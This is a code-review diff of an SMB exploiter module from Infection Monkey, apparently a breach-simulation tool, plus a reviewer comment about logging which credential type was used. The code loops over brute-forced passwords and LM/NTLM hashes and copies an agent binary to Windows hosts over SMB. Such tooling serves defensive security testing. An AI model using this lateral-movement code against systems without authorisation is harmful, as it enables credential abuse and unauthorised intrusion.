monkey/infection_monkey/exploit/smbexec.py

```diff
@@ -1,179 +1,156 @@
 
 logger = getLogger(__name__)
 
 
-class SmbExploiter(HostExploiter):
+class SMBExploiter(HostExploiter):
     _TARGET_OS_TYPE = ["windows"]
     _EXPLOITED_SERVICE = "SMB"
     KNOWN_PROTOCOLS = {
         "139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139),
         "445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445),
     }
     USE_KERBEROS = False
-
-    def __init__(self, host):
-        super(SmbExploiter, self).__init__(host)
-
-    def is_os_supported(self):
-        if super(SmbExploiter, self).is_os_supported():
-            return True
-
-        if not self.host.os.get("type"):
-            is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445)
-            if is_smb_open:
-                smb_finger = SMBFinger()
-                smb_finger.get_host_fingerprint(self.host)
-            else:
-                is_nb_open, _ = check_tcp_port(self.host.ip_addr, 139)
-                if is_nb_open:
-                    self.host.os["type"] = "windows"
-            return self.host.os.get("type") in self._TARGET_OS_TYPE
-        return False
+    SMB_SERVICE_NAME = "InfectionMonkey"
 
     def _exploit_host(self):
-        src_path = get_target_monkey(self.host)
-
-        if not src_path:
-            logger.info("Can't find suitable monkey executable for host %r", self.host)
-            return False
+        agent_binary = self.agent_repository.get_agent_binary(self.host.os["type"])
+        dest_path = get_agent_dest_path(self.host, self.options)
+        creds = generate_brute_force_combinations(self.options["credentials"])
 
-        # TODO use infectionmonkey.utils.brute_force
-        creds = self._config.get_exploit_user_password_or_hash_product()
-
-        exploited = False
         for user, password, lm_hash, ntlm_hash in creds:
             try:
                 # copy the file remotely using SMB
                 remote_full_path = SmbTools.copy_file(
                     self.host,
-                    src_path,
-                    self._config.dropper_target_path_win_32,
+                    agent_binary,
+                    dest_path,
                     user,
                     password,
                     lm_hash,
                     ntlm_hash,
-                    self._config.smb_download_timeout,
+                    self.options["smb_download_timeout"],
                 )
 
                 if remote_full_path is not None:
-                    logger.debug(
-                        "Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) "
-                        "%s : (SHA-512) %s)",
-                        self.host,
-                        user,
-                        self._config.hash_sensitive_data(password),
-                        self._config.hash_sensitive_data(lm_hash),
-                        self._config.hash_sensitive_data(ntlm_hash),
+                    logger.info(
+                        f'Successfully logged in to {self.host.ip_addr} using user "{user}"'
```

Comment:
Would be good to know which type of credentials were used. use `infection_monkey.utils.brute_force.get_credential_string`